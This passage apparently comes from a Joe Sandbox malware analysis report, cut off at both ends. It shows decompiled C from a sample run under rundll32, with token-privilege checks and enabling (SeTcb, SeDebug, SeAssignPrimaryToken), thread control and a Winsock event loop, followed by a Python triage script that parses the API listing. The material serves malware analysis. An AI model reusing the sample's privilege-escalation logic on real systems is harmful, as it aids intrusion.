                                                            				if(_t52 == 0) {
                                                            					 *_t20(0xbb8);
                                                            				}
                                                            				_t53 = Sleep;
                                                            				if(_t74 == 0) {
                                                            					Sleep(0x1388);
                                                            				}
                                                            				_t95 = _t81;
                                                            				if(_t81 == 0) {
                                                            					Sleep(0x1388);
                                                            				}
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				L04649390(_t53,  &_v16, _t74, _t81, _t95, L"Dispatch");
                                                            				_t75 = CloseHandle;
                                                            				if(_v20 != 0) {
                                                            					L20:
                                                            					_t82 = 0;
                                                            					__eflags = 0;
                                                            					goto L21;
                                                            				} else {
                                                            					_t97 = _v12;
                                                            					_t55 = WaitForSingleObject;
                                                            					if(_v12 == 0) {
                                                            						while(1) {
                                                            							L25:
                                                            							_t25 = E046494D0(_t55, L"Control", _t75, _t81, _t105);
                                                            							_t106 = _t25;
                                                            							if(_t25 == 0) {
                                                            							}
                                                            							L26:
                                                            							_t62 =  &_v28;
                                                            							_v28 = 0;
                                                            							_t77 = E04649620(_t55,  &_v28, _t75, _t81, _t106);
                                                            							if(_t28 == 0) {
                                                            								L24:
                                                            								_t75 = CloseHandle;
                                                            								while(1) {
                                                            									L25:
                                                            									_t25 = E046494D0(_t55, L"Control", _t75, _t81, _t105);
                                                            									_t106 = _t25;
                                                            									if(_t25 == 0) {
                                                            									}
                                                            									goto L26;
                                                            								}
                                                            							}
                                                            							_t70 = _v28;
                                                            							if(_v28 == 0) {
                                                            								goto L24;
                                                            							}
                                                            							_t81 = E04649910(_t77, _t70, _t62);
                                                            							L04655B0F(_t77);
                                                            							_t75 = CloseHandle;
                                                            							_t88 = _t88 + 8;
                                                            							if(_t81 != 0) {
                                                            								_t31 = WaitForSingleObject(_t81, 0xbb8);
                                                            								_t105 = _t31 - 0x102;
                                                            								if(_t31 == 0x102) {
                                                            									CloseHandle(_t81);
                                                            								}
                                                            							}
                                                            							while(1) {
                                                            								L25:
                                                            								_t25 = E046494D0(_t55, L"Control", _t75, _t81, _t105);
                                                            								_t106 = _t25;
                                                            								if(_t25 == 0) {
                                                            								}
                                                            								goto L31;
                                                            							}
                                                            							goto L26;
                                                            							L31:
                                                            							__eflags = _t25 - 0x1fffffff;
                                                            							if(_t25 == 0x1fffffff) {
                                                            								do {
                                                            									_t26 = SetConsoleCtrlHandler(E0464AAF0, 0);
                                                            									__eflags = _t26;
                                                            								} while (_t26 != 0);
                                                            								_t82 = 0x315;
                                                            								L21:
                                                            								_t22 = _v8;
                                                            								__eflags = _t22;
                                                            								if(_t22 != 0) {
                                                            									CloseHandle(_t22);
                                                            								}
                                                            								return _t82;
                                                            							}
                                                            							__eflags = _t25 - 0x2fffffff;
                                                            							if(__eflags != 0) {
                                                            								_t81 = OpenThread(0x1fffff, 0, _t25);
                                                            								__eflags = _t81;
                                                            								if(__eflags == 0) {
                                                            									goto L26;
                                                            								}
                                                            								WaitForSingleObject(_t81, 0xffffffff);
                                                            								CloseHandle(_t81);
                                                            								continue;
                                                            							}
                                                            							Sleep(0x7d0);
                                                            							_t64 =  &_v20;
                                                            							_v20 = 0;
                                                            							_t81 = E04649620(_t55,  &_v20, _t75, _t81, __eflags);
                                                            							__eflags = _t35;
                                                            							if(__eflags == 0) {
                                                            								continue;
                                                            							}
                                                            							_t71 = _v20;
                                                            							__eflags = _v20;
                                                            							if(__eflags == 0) {
                                                            								continue;
                                                            							}
                                                            							_t78 = E04649910(_t81, _t71, _t64);
                                                            							L04655B0F(_t81);
                                                            							_t88 = _t88 + 8;
                                                            							__eflags = _t78;
                                                            							if(__eflags == 0) {
                                                            								goto L24;
                                                            							}
                                                            							__eflags = WaitForSingleObject(_t78, 0xbb8) - 0x102;
                                                            							if(__eflags != 0) {
                                                            								goto L24;
                                                            							}
                                                            							CloseHandle(_t78);
                                                            							E046378B0(_t55, L"Dispatch", 0x2fffffff, CloseHandle, _t81, __eflags);
                                                            							do {
                                                            								_t41 = SetConsoleCtrlHandler(E0464AAF0, 0);
                                                            								__eflags = _t41;
                                                            							} while (_t41 != 0);
                                                            							_t82 = 0x315;
                                                            							goto L21;
                                                            						}
                                                            					}
                                                            					_t42 = E046494D0(WaitForSingleObject, L"Dispatch", CloseHandle, _t81, _t97);
                                                            					if(_t42 == 0) {
                                                            						goto L25;
                                                            					}
                                                            					while(_t42 != 0x2fffffff && _t42 != 0x1fffffff) {
                                                            						_t81 = OpenThread(0x1fffff, 0, _t42);
                                                            						if(_t81 == 0) {
                                                            							goto L25;
                                                            						}
                                                            						WaitForSingleObject(_t81, 0xffffffff);
                                                            						if(GetExitCodeThread(_t81,  &_v28) == 0) {
                                                            							L16:
                                                            							_t48 = L04649390(_t55,  &_v24, _t75, _t81, _t103, L"Dispatch");
                                                            							_t104 = _t48;
                                                            							if(_t48 != 0) {
                                                            								goto L25;
                                                            							}
                                                            							_t42 = E046494D0(_t55, L"Dispatch", _t75, _t81, _t104);
                                                            							_t105 = _t42;
                                                            							if(_t42 != 0) {
                                                            								continue;
                                                            							}
                                                            							goto L25;
                                                            						}
                                                            						_t103 = _v28 - 0x315;
                                                            						if(_v28 == 0x315) {
                                                            							goto L20;
                                                            						}
                                                            						goto L16;
                                                            					}
                                                            					E0464AAD0();
                                                            					goto L20;
                                                            				}
                                                            			}

                                                            • Instruction address column for the C code above: 0x04649e66 to 0x0464a0fd (per-line alignment with the C body was not preserved)

                                                            APIs
                                                              • Part of subcall function 0464ADD0: GetCurrentProcess.KERNEL32(00000008,?), ref: 0464AE13
                                                              • Part of subcall function 0464ADD0: OpenProcessToken.ADVAPI32(00000000), ref: 0464AE1A
                                                              • Part of subcall function 0464ADD0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,00000000), ref: 0464AE2B
                                                              • Part of subcall function 0464ADD0: PrivilegeCheck.ADVAPI32(00000000,00000000,00000000), ref: 0464AE5D
                                                              • Part of subcall function 0464AC90: GetCurrentProcess.KERNEL32(00000028,?,00000000,00000000,?,?,04649E8E), ref: 0464ACAF
                                                              • Part of subcall function 0464AC90: OpenProcessToken.ADVAPI32(00000000,?,?,04649E8E), ref: 0464ACB6
                                                              • Part of subcall function 0464AC90: LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,04649E8E), ref: 0464ACE1
                                                              • Part of subcall function 0464AC90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,04649E8E), ref: 0464ACF6
                                                              • Part of subcall function 0464AC90: GetLastError.KERNEL32(?,?,04649E8E), ref: 0464ACFC
                                                              • Part of subcall function 0464AC90: CloseHandle.KERNEL32(?,?,?,04649E8E), ref: 0464AD0C
                                                            • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04649EC9
                                                            • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04649ED4
                                                            • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 04649F3E
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04649F4D
                                                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 04649F55
                                                            • WaitForSingleObject.KERNEL32(00000000,00000BB8,?,Dispatch,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 0464A001
                                                            • CloseHandle.KERNEL32(00000000,?,Dispatch,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 0464A00B
                                                            • Sleep.KERNEL32(000007D0), ref: 0464A02A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$OpenPrivilegeSleepToken$CloseCurrentHandleLookupObjectSingleThreadValueWait$AdjustCheckCodeErrorExitLastPrivileges
                                                            • String ID: Control$Dispatch$SeAssignPrimaryTokenPrivilege$SeDebugPrivilege$SeIncreaseQuotaPrivilege$SeTcbPrivilege
                                                            • API String ID: 1163877494-1245876370
                                                            • Opcode ID: b5bcc9eb5a761d7a4ee672d2934e42335e7f0ca6103428370a17081afda87595
                                                            • Instruction ID: c3897374ae74f980bc224e286a10ff6b02ccdde07302e6eed03eefc535ce8ddc
                                                            • Opcode Fuzzy Hash: b5bcc9eb5a761d7a4ee672d2934e42335e7f0ca6103428370a17081afda87595
                                                            • Instruction Fuzzy Hash: D65108B16883119BFF64AE749844B2B32999FE0728F150628F911973C0FF64F90986F6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
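As an added example (not part of the Joe Sandbox report and not code from the sample), the Python script below parses the API listing of this function into structured calls and answers the questions a triager asks of it: which privileges the helpers 0464ADD0 and 0464AC90 only check (PrivilegeCheck) versus enable (AdjustTokenPrivileges), whether the ERROR_NOT_ALL_ASSIGNED result of AdjustTokenPrivileges is read back through GetLastError, which rights the 0x1FFFFF mask passed to OpenThread grants, and what the Sleep and WaitForSingleObject arguments are in milliseconds. The input is the listing copied from this page; the grouping-by-subcall heuristic and the thread-right table are assumptions of this example, and THREAD_ALL_ACCESS is decoded against its Vista-and-later value 0x1FFFFF.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: the API lines of this function, copied from the Joe Sandbox
# listing above (bullet and "Part of subcall function" prefix as the report prints them).
REPORT_LINES = """\
• Part of subcall function 0464ADD0: GetCurrentProcess.KERNEL32(00000008,?), ref: 0464AE13
• Part of subcall function 0464ADD0: OpenProcessToken.ADVAPI32(00000000), ref: 0464AE1A
• Part of subcall function 0464ADD0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,00000000), ref: 0464AE2B
• Part of subcall function 0464ADD0: PrivilegeCheck.ADVAPI32(00000000,00000000,00000000), ref: 0464AE5D
• Part of subcall function 0464AC90: GetCurrentProcess.KERNEL32(00000028,?,00000000,00000000,?,?,04649E8E), ref: 0464ACAF
• Part of subcall function 0464AC90: OpenProcessToken.ADVAPI32(00000000,?,?,04649E8E), ref: 0464ACB6
• Part of subcall function 0464AC90: LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,04649E8E), ref: 0464ACE1
• Part of subcall function 0464AC90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,04649E8E), ref: 0464ACF6
• Part of subcall function 0464AC90: GetLastError.KERNEL32(?,?,04649E8E), ref: 0464ACFC
• Part of subcall function 0464AC90: CloseHandle.KERNEL32(?,?,?,04649E8E), ref: 0464AD0C
• Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04649EC9
• Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04649ED4
• OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 04649F3E
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04649F4D
• GetExitCodeThread.KERNEL32(00000000,?), ref: 04649F55
• WaitForSingleObject.KERNEL32(00000000,00000BB8,?,Dispatch,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 0464A001
• CloseHandle.KERNEL32(00000000,?,Dispatch,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 0464A00B
• Sleep.KERNEL32(000007D0), ref: 0464A02A
"""

_LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)
_PRIV_RE = re.compile(r"^Se\w+Privilege$")
INFINITE = 0xFFFFFFFF
THREAD_ALL_ACCESS = 0x1FFFFF  # Vista+: STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFFF
THREAD_RIGHTS = {  # assumption of this example: standard thread access-right bits
    0x0001: "THREAD_TERMINATE", 0x0002: "THREAD_SUSPEND_RESUME",
    0x0008: "THREAD_GET_CONTEXT", 0x0010: "THREAD_SET_CONTEXT",
    0x0020: "THREAD_SET_INFORMATION", 0x0040: "THREAD_QUERY_INFORMATION",
    0x0080: "THREAD_SET_THREAD_TOKEN", 0x0100: "THREAD_IMPERSONATE",
    0x0200: "THREAD_DIRECT_IMPERSONATION", 0x0400: "THREAD_SET_LIMITED_INFORMATION",
    0x0800: "THREAD_QUERY_LIMITED_INFORMATION", 0x00010000: "DELETE",
    0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: str
    subcall: Optional[str]  # helper the call lives in; None when it is in the function itself


def parse_api_line(line):
    """One listing line -> ApiCall, or None for headings and non-API text."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    args = tuple(a.strip() for a in m.group("args").split(",")) if m.group("args") else ()
    return ApiCall(m.group("api"), m.group("mod"), args, m.group("ref").upper(), m.group("sub"))


def parse_report(text):
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def hex_arg(arg):
    """Joe prints numeric arguments as hex; '?' and string arguments give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def privilege_summary(calls):
    """Privilege name -> what the helper that looks it up does with it:
    'enabled' (AdjustTokenPrivileges), 'checked' (PrivilegeCheck only) or 'looked_up'."""
    groups = {}
    for c in calls:
        groups.setdefault(c.subcall, []).append(c)
    out = {}
    for group in groups.values():
        apis = {c.api for c in group}
        action = ("enabled" if "AdjustTokenPrivileges" in apis
                  else "checked" if "PrivilegeCheck" in apis else "looked_up")
        for c in group:
            if c.api == "LookupPrivilegeValueW":
                out.update({a: action for a in c.args if _PRIV_RE.match(a)})
    return out


def checks_not_all_assigned(calls):
    """AdjustTokenPrivileges returns TRUE even when nothing was granted; the caller
    must read GetLastError for ERROR_NOT_ALL_ASSIGNED (0x514). True if it does."""
    return any(a.api == "AdjustTokenPrivileges" and b.api == "GetLastError"
               and a.subcall == b.subcall for a, b in zip(calls, calls[1:]))


def decode_thread_access(mask):
    names = [n for bit, n in THREAD_RIGHTS.items() if mask & bit]
    if mask == THREAD_ALL_ACCESS:
        names.insert(0, "THREAD_ALL_ACCESS")
    return names


def decode_waits(calls):
    """(ref, api, milliseconds or 'INFINITE') for each Sleep / WaitForSingleObject."""
    out = []
    for c in calls:
        v = hex_arg(c.args[0]) if c.api == "Sleep" else \
            hex_arg(c.args[1]) if c.api == "WaitForSingleObject" else None
        if v is not None:
            out.append((c.ref, c.api, "INFINITE" if v == INFINITE else v))
    return out


def summarize(text):
    calls = parse_report(text)
    return {
        "privileges": privilege_summary(calls),
        "checks_not_all_assigned": checks_not_all_assigned(calls),
        "thread_access": {c.ref: decode_thread_access(hex_arg(c.args[0]))
                          for c in calls if c.api == "OpenThread"},
        "waits": decode_waits(calls),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(REPORT_LINES), indent=2))
```

Two caveats when reading the result against the C body above. The listing prints only one privilege string per helper, while the body passes four (SeTcbPrivilege and SeDebugPrivilege through 0464ADD0, SeIncreaseQuotaPrivilege and SeAssignPrimaryTokenPrivilege through 0464AC90), so the table-derived summary is a lower bound; the body also shows that a missing privilege only costs a Sleep of 0x1388 (5000 ms) or 0xbb8 (3000 ms) before the code carries on. And the WaitForSingleObject at 04649F4D is printed with 000000FF, whereas the body passes 0xffffffff (INFINITE) at that site; the listing shows the 8-bit immediate of a sign-extended push, so take the timeout from the body, not the table.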

                                                            C-Code - Quality: 24%
                                                            			E0464DCA0(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi, short* _a4, intOrPtr _a8) {
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				signed int _v20;
                                                            				LARGE_INTEGER* _v24;
                                                            				signed int _v28;
                                                            				_Unknown_base(*)()* _v32;
                                                            				intOrPtr* _v44;
                                                            				signed int _v56;
                                                            				_Unknown_base(*)()* _v76;
                                                            				void* __esi;
                                                            				short* _t89;
                                                            				signed int _t92;
                                                            				signed int _t94;
                                                            				signed int _t101;
                                                            				signed int _t109;
                                                            				signed int _t112;
                                                            				void* _t118;
                                                            				signed int _t120;
                                                            				signed int _t122;
                                                            				signed int _t127;
                                                            				signed int _t132;
                                                            				signed int _t133;
                                                            				signed int _t136;
                                                            				signed int _t137;
                                                            				signed int _t138;
                                                            				void** _t140;
                                                            				signed int _t141;
                                                            				signed int _t144;
                                                            				signed int _t145;
                                                            				long _t149;
                                                            				intOrPtr _t152;
                                                            				signed int _t156;
                                                            				LARGE_INTEGER* _t159;
                                                            				long _t160;
                                                            				LARGE_INTEGER* _t167;
                                                            				intOrPtr* _t169;
                                                            				LARGE_INTEGER* _t178;
                                                            				_Unknown_base(*)()* _t189;
                                                            				intOrPtr* _t191;
                                                            				intOrPtr* _t197;
                                                            				_Unknown_base(*)()* _t200;
                                                            				intOrPtr* _t203;
                                                            				signed int _t210;
                                                            				signed int _t212;
                                                            				signed int _t216;
                                                            				LARGE_INTEGER* _t217;
                                                            
                                                            				_t210 = _t216;
                                                            				_t189 = 0;
                                                            				_t197 = __ecx;
                                                            				if(_a8 == 0) {
                                                            					_t89 = _a4;
                                                            					__eflags =  *_t89 - 2;
                                                            					_t163 =  !=  ? 0x1c : 0x10;
                                                            					__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t89,  !=  ? 0x1c : 0x10);
                                                            					__eflags = _t89 - 0xffffffff;
                                                            					if(_t89 == 0xffffffff) {
                                                            						goto L14;
                                                            					} else {
                                                            						__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x23);
                                                            						__eflags = _t89 - 0xffffffff;
                                                            						if(_t89 == 0xffffffff) {
                                                            							goto L14;
                                                            						} else {
                                                            							 *(__ecx + 0x4c) = 1;
                                                            							 *(__ecx + 0x50) = 1;
                                                            							SetLastError(0);
                                                            							_t92 =  *((intOrPtr*)( *_t197 + 0x7c))();
                                                            							__eflags = _t92 - 2;
                                                            							if(_t92 != 2) {
                                                            								__imp__#19( *((intOrPtr*)(_t197 + 0x1c)), 0, 0, 0);
                                                            								__eflags = _t92 - 0xffffffff;
                                                            								if(_t92 != 0xffffffff) {
                                                            									goto L13;
                                                            								} else {
                                                            									__imp__#111();
                                                            									__eflags = _t92 - 0x2733;
                                                            									if(_t92 == 0x2733) {
                                                            										goto L13;
                                                            									} else {
                                                            										__eflags = _t92;
                                                            										if(_t92 != 0) {
                                                            											E04637AC0();
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											asm("int3");
                                                            											_t212 = _t216;
                                                            											_t217 = _t216 - 0x18;
                                                            											_t94 =  *0x4684008; // 0xd355be4e
                                                            											_v56 = _t94 ^ _t212;
                                                            											_t191 = _v44;
                                                            											GetCurrentThreadId();
                                                            											 *((intOrPtr*)( *_t191 + 0xbc))(GetCurrentThreadId(), 0, _t197, __ebx, _t210, 0x80004005);
                                                            											__eflags =  *(_t191 + 0x38);
                                                            											_v76 = 1;
                                                            											if( *(_t191 + 0x38) <= 0) {
                                                            												L19:
                                                            												_t200 = 0;
                                                            												__eflags = 0;
                                                            											} else {
                                                            												__eflags =  *(_t191 + 0x3c);
                                                            												if( *(_t191 + 0x3c) <= 0) {
                                                            													goto L19;
                                                            												} else {
                                                            													_t200 = 1;
                                                            												}
                                                            											}
                                                            											_v16 = _t200;
                                                            											_t156 =  *((intOrPtr*)( *_t191 + 0xc4))();
                                                            											_t22 = _t200 + 4; // 0x5
                                                            											_t101 = _t22;
                                                            											_v20 = _t156;
                                                            											_v28 = _t101;
                                                            											__eflags = _t156;
                                                            											if(_t156 != 0) {
                                                            												_t101 = 1 + _t101;
                                                            												__eflags = _t101;
                                                            												_v28 = _t101;
                                                            											}
                                                            											E04671860();
                                                            											_t167 = _t217;
                                                            											_t201 = 0;
                                                            											_v24 = _t167;
                                                            											_t167->LowPart =  *(_t191 + 0x20);
                                                            											_t167->LowPart.HighPart =  *(_t191 + 0x174);
                                                            											 *((intOrPtr*)(_t167 + 8)) =  *((intOrPtr*)(_t191 + 0x178));
                                                            											 *((intOrPtr*)(_t167 + 0xc)) =  *((intOrPtr*)(_t191 + 0x17c));
                                                            											_t107 = 4;
                                                            											__eflags = _v16;
                                                            											if(__eflags == 0) {
                                                            												L25:
                                                            												__eflags = _t156;
                                                            												if(_t156 != 0) {
                                                            													 *(_t167 + _t107 * 4) = _t156;
                                                            												}
                                                            												_v20 =  *((intOrPtr*)(_t191 + 0x2c));
                                                            												_t109 =  *(_t191 + 0x5c);
                                                            												__eflags = _t109;
                                                            												if(_t109 != 0) {
                                                            													L0465ED17(_t109);
                                                            													_t217 =  &(_t217->LowPart.HighPart);
                                                            													 *(_t191 + 0x5c) = 0;
                                                            													 *(_t191 + 0x60) = 0;
                                                            													 *(_t191 + 0x64) = 0;
                                                            												}
                                                            												_t53 = _t191 + 0x5c; // 0x5d
                                                            												E0463ADA0(_t53, _v20, _t167, 0);
                                                            												_t169 = _t191;
                                                            												_t112 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                            												__eflags = _t112;
                                                            												if(_t112 == 0) {
                                                            													L54:
                                                            													_t169 = _t191;
                                                            													 *((intOrPtr*)( *_t191 + 0xc0))(GetCurrentThreadId());
                                                            													__eflags = _v32;
                                                            													if(_v32 != 0) {
                                                            														_t169 = _t191;
                                                            														_t127 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                            														__eflags = _t127;
                                                            														if(_t127 != 0) {
                                                            															_t169 = _t191;
                                                            															 *((intOrPtr*)( *_t191 + 4))();
                                                            														}
                                                            													}
                                                            													GetCurrentThreadId();
                                                            													__eflags = _t201;
                                                            													if(_t201 == 0) {
                                                            														L61:
                                                            														__eflags = _v12 ^ _t212;
                                                            														return E04655AFE(_v12 ^ _t212);
                                                            													} else {
                                                            														_t118 =  *_t201;
                                                            														__eflags = _t118;
                                                            														if(_t118 == 0) {
                                                            															L60:
                                                            															_push(4);
                                                            															E04655B47(_t201);
                                                            															goto L61;
                                                            														} else {
                                                            															_t120 = CloseHandle(_t118);
                                                            															__eflags = _t120;
                                                            															if(_t120 == 0) {
                                                            																goto L64;
                                                            															} else {
                                                            																goto L60;
                                                            															}
                                                            														}
                                                            													}
                                                            												} else {
                                                            													_t159 = _v24;
                                                            													do {
                                                            														__imp__WSAWaitForMultipleEvents(_v28, _t159, 0, 0xffffffff, 0);
                                                            														__eflags = _t112;
                                                            														if(_t112 != 0) {
                                                            															__eflags = _t112 - 1;
                                                            															if(_t112 != 1) {
                                                            																__eflags = _t112 - 2;
                                                            																if(_t112 == 2) {
                                                            																	_v32 = 0;
                                                            																	goto L54;
                                                            																} else {
                                                            																	__eflags = _t112 - 3;
                                                            																	if(_t112 != 3) {
                                                            																		__eflags = _t112 - 4;
                                                            																		if(_t112 != 4) {
                                                            																			__eflags = _t112 - 5;
                                                            																			if(_t112 != 5) {
                                                            																				__eflags = _t112 - 0xffffffff;
                                                            																				if(_t112 != 0xffffffff) {
                                                            																					goto L63;
                                                            																				} else {
                                                            																					__imp__#111();
                                                            																					 *(_t191 + 0xc) = 1;
                                                            																					 *(_t191 + 0x10) = 0;
                                                            																					 *(_t191 + 0x14) = _t112;
                                                            																					 *(_t191 + 0x18) = 1;
                                                            																					goto L54;
                                                            																				}
                                                            																			} else {
                                                            																				goto L47;
                                                            																			}
                                                            																		} else {
                                                            																			__eflags = _v16;
                                                            																			if(_v16 == 0) {
                                                            																				L47:
                                                            																				_t132 =  *((intOrPtr*)( *_t191 + 0xc8))();
                                                            																				__eflags = _t132;
                                                            																				if(_t132 == 0) {
                                                            																					_t133 = GetLastError();
                                                            																					__eflags = _t133;
                                                            																					 *(_t191 + 0xc) = 1;
                                                            																					 *(_t191 + 0x10) = 5;
                                                            																					_t134 =  ==  ? 0x4c7 : _t133;
                                                            																					 *(_t191 + 0x14) =  ==  ? 0x4c7 : _t133;
                                                            																					 *(_t191 + 0x18) = 1;
                                                            																					goto L54;
                                                            																				} else {
                                                            																					goto L48;
                                                            																				}
                                                            																			} else {
                                                            																				L65();
                                                            																				__eflags = _t112;
                                                            																				if(_t112 == 0) {
                                                            																					goto L54;
                                                            																				} else {
                                                            																					goto L48;
                                                            																				}
                                                            																			}
                                                            																		}
                                                            																	} else {
                                                            																		_t136 = L0464E3B0(_t112, _t191);
                                                            																		__eflags = _t136;
                                                            																		if(_t136 == 0) {
                                                            																			goto L54;
                                                            																		} else {
                                                            																			goto L48;
                                                            																		}
                                                            																	}
                                                            																}
                                                            															} else {
                                                            																_t137 = E0464E540(_t191);
                                                            																__eflags = _t137;
                                                            																if(_t137 == 0) {
                                                            																	goto L54;
                                                            																} else {
                                                            																	goto L48;
                                                            																}
                                                            															}
                                                            														} else {
                                                            															_t138 = E0464E140(_t191);
                                                            															__eflags = _t138;
                                                            															if(_t138 == 0) {
                                                            																goto L54;
                                                            															} else {
                                                            																goto L48;
                                                            															}
                                                            														}
                                                            														goto L72;
                                                            														L48:
                                                            														_t169 = _t191;
                                                            														_t112 =  *((intOrPtr*)( *_t191 + 0x24))();
                                                            														__eflags = _t112;
                                                            													} while (_t112 != 0);
                                                            													goto L54;
                                                            												}
                                                            											} else {
                                                            												_t140 = L04655B14(0, __eflags, 4);
                                                            												_t217 =  &(_t217->LowPart.HighPart);
                                                            												_t201 = _t140;
                                                            												 *_t201 = 0;
                                                            												_t141 = CreateWaitableTimerW(0, 0, 0);
                                                            												 *_t201 = _t141;
                                                            												__eflags = _t141;
                                                            												if(_t141 == 0) {
                                                            													_push(0x80004005);
                                                            													E04637AC0();
                                                            													L63:
                                                            													_push(0x80004005);
                                                            													E04637AC0();
                                                            													L64:
                                                            													_push(0x80004005);
                                                            													E04637AC0();
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													asm("int3");
                                                            													_push(_t201);
                                                            													_t203 = _t169;
                                                            													_t122 =  *(_t203 + 0x188);
                                                            													 *(_t203 + 0x188) = 1 +  *(_t203 + 0x188);
                                                            													__eflags = _t122 -  *((intOrPtr*)(_t203 + 0x38));
                                                            													if(_t122 <  *((intOrPtr*)(_t203 + 0x38))) {
                                                            														__imp__#19( *((intOrPtr*)(_t203 + 0x1c)), 0, 0, 0);
                                                            														__eflags = _t122 - 0xffffffff;
                                                            														if(_t122 != 0xffffffff) {
                                                            															L71:
                                                            															return 1;
                                                            														} else {
                                                            															__imp__#111();
                                                            															__eflags = _t122 - 0x2733;
                                                            															if(_t122 == 0x2733) {
                                                            																goto L71;
                                                            															} else {
                                                            																__eflags = _t122;
                                                            																if(_t122 == 0) {
                                                            																	goto L71;
                                                            																} else {
                                                            																	 *(_t203 + 0x14) = _t122;
                                                            																	__eflags = 0;
                                                            																	 *(_t203 + 0xc) = 1;
                                                            																	 *(_t203 + 0x10) = 5;
                                                            																	 *(_t203 + 0x18) = 1;
                                                            																	return 0;
                                                            																}
                                                            															}
                                                            														}
                                                            													} else {
                                                            														 *(_t203 + 0xc) = 1;
                                                            														__eflags = 0;
                                                            														 *(_t203 + 0x10) = 5;
                                                            														 *(_t203 + 0x14) = 0;
                                                            														 *(_t203 + 0x18) = 0;
                                                            														return 0;
                                                            													}
                                                            												} else {
                                                            													_t160 =  *(_t191 + 0x3c);
                                                            													L04671B10();
                                                            													_t178 = _t217;
                                                            													_t144 = _t160;
                                                            													_t145 = _t144 * 0x2710;
                                                            													__eflags = _t145;
                                                            													asm("adc edx, 0x0");
                                                            													_t178->LowPart =  ~_t145;
                                                            													_t178->LowPart.HighPart =  ~(_t144 * 0x2710 >> 0x20);
                                                            													SetWaitableTimer( *_t201, _t178, _t160, 0, 0, 0);
                                                            													_t167 = _v24;
                                                            													_t156 = _v20;
                                                            													 *(_t167 + 0x10) =  *_t201;
                                                            													_t107 = 5;
                                                            													goto L25;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											goto L13;
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								_t149 = GetLastError();
                                                            								__eflags = _t149;
                                                            								_t150 =  ==  ? 0x4c7 : _t149;
                                                            								__imp__#112( ==  ? 0x4c7 : _t149);
                                                            								return 0;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x30);
                                                            					if(__eax == 0xffffffff) {
                                                            						L14:
                                                            						return _t189;
                                                            					} else {
                                                            						_t152 = _a4;
                                                            						_t181 =  !=  ? 0x1c : 0x10;
                                                            						__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t152,  !=  ? 0x1c : 0x10);
                                                            						if(_t152 == 0) {
                                                            							L13:
                                                            							_t189 = 1;
